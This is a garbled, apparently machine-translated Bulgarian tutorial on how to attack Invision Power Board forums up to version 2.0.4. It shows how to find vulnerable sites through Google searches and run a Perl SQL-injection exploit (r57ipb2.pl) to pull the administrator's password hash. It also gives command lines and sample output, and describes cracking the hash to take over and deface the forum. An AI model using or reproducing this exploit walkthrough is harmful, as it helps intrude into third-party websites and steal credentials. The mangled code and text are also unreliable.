Как да се използва експлойта)

Така че ... Ако честно zadalbali въпрос "как да използвате sploitov"
Е, най-вероятно да започне

Като цяло инструкции стъпка по стъпка как да използвате [б] експлойта [/ б]!
Попитайте защо е необходимо? Eksploity - скриптове, които използват портали за уязвимост, форуми и т.н. С sploitov може да доведе администратор хешове офлайн, например, в последствие се наложи да Достум администраторския контролен панел и обезобразят форум.
Например, ние ще използваме SQL-инжекция във форуми IPB на до версия 2.0.4 Уязвимост сигурност стар, но пълен с дупки във форумите на мрежата са били, са и ще бъдат там.
Така prodolzhim.Dlya за нас да се намери подходящият форум, разбира се, ние се изкачи до [й], Google [/ б] Дала изкачване в разширено търсене и влиза в нашите zapros.Zapros ще vygledet така [б] Invision Board Мощност 2.0.4 [/ б] и настроите желаната стойност от 100 места по ключова дума, но с разходите по подразбиране 10.

Така че ние открихме, форум, на който стои Invision Power Board 2.0.4.

Тогава ние се изкачи отново на Google и търсене на употребявате за Invision Power Board 2.0.4 версия.

Така че ние открихме нашите sploit.A експлоатират прилича

$ Сървър = $ ARGV [0];
$ Path = $ ARGV [1];
$ Member_id = $ ARGV [2];
$ Целева = $ ARGV [3];

] СЪРВЪРА: $ serverrn ";
отпечатва "[

] PATH: $ pathrn ";
отпечатва "[

] ID на: $ member_idrn ";
отпечатва "[

] ПРЕДНАЗНАЧЕН: $ мишена ";
печат (($ цел) ( "- Опел 2. *") :( "- IPB 1. *"?));
печат «ина»;
отпечатва "[

] В ТЪРСЕНЕ ПАРОЛА ... [|] ";

под чек ($)
$ М ++;
статус ();
$ Ccheck = $ _ [0];
$ Pass_hash1 = "% 36% 36% 36% 2 527 процента 20% 4F% 52% 20% 28% 69% 64% 3D";
$ Pass_hash2 = "% 20% 41% 4Е% 44% 20% 61% 73% 63% 69% 69% 28% 73% 75% 62% 73% 74% 72% 69% 6Е% 67% 28";
$ Pass_hash3 = $ подаване "," $ s_num ", 1))" $ ccheck ") / *" .....;
$ Pass_hash3 =

и /(.)/"% "(% 2.2x", ORD ($ 1)) / например UC sprintf () ".
$ Nmalykh = "% 20";
$ Socket = IO :: Socket :: INET-> нов (Proto => «TCP», PeerAddr => "$ сървър", PeerPort => «80»);

ФОРМАТ $ гнездо ( «GET% sindex.php акт = LoginCODE = автоматично влизане HTTP / 1.0nHost:% snAccept: * / * nCookie: member_id =% S; pass_hash =% S% S% S% S% snConnection :? closenn»,
$ Path, $ сървър, $ cmember_id, $ pass_hash1, $ cmember_id, $ pass_hash2, $ pass_hash3, $ nmalykh);


r57ipb2.pl [сървър] [/ папка /] [member_id] [мишена]

[Сървър] - домакин, където инсталиран IPB
[/ Папка /] - папка, където инсталиран IPB
[Member_id] - потребителско име за груба

цели:
0 - IPB 1. *
1 - Опел 2. * (преди 2.0.4)

Осъзнаваш ли подвиг написан на Perl / За да го zayuzat, ние се нуждаем от програма под името [б] ActivePerl [б] skchat тя може да бъде [б] [един HREF = «soft.softodrom.ru/ap/p478.shtml»] тук [/ а] [Ь]

По този начин, инсталиран на преводача. Пусни го:
Start-> хода на подготовката> CMD

В подканата набиране:
C: put_k_Perl C: put_k_faylu_imya.pl сайт / papka_s_forumom / 1 0

когато:
C: put_k_Perl - е пътят до файла преводач, например C: perlbinperl

C: put_k_faylu_imya.pl - път да ви спаси с sploitov код файла

сайт - сайт за на форума, достъпът до които искате да получавате такива lamer.com

papka_s_forumom - папката на сървъра, на който инсталира онлайн двигателя (вижте адреса на браузъра)

1 - идентификатор на потребителя, чието сегментиране искаме да доведе. защото ние се нуждаем от администратор хеша, сложи уреда, първо patamushta Offline regisriruyutsa estessno администратори

0 - Версия искаме vzlamat (0 - IPB 1. *, 1 - Опел 2. *)

String CMD в ще изглежда по следния начин:
C: perlbinperl в: ipb.pl terion.com / форум / 1 0

Всичко, натиснете Enter и изчакайте.
Ако направи всичко по силите и на форума не е поправена, ще видите нещо подобно следната картина:

r57ipb2.pl blah.com / ipb13 / 1 0
[

] ПРЕДНАЗНАЧЕН: 0 - IPB 1. *
[

] ТЪРСЕНЕ ПАРОЛА ... [СЪСТАВЕНО]

ID на: 1
Парола: 5f4dcc3b5aa765d61d8327deb882cf99

Тук той хеширате: 5f4dcc3b5aa765d61d8327deb882cf99
Сега ние го разшифровате по всеки възможен начин и да получите паролата за администратора на форума.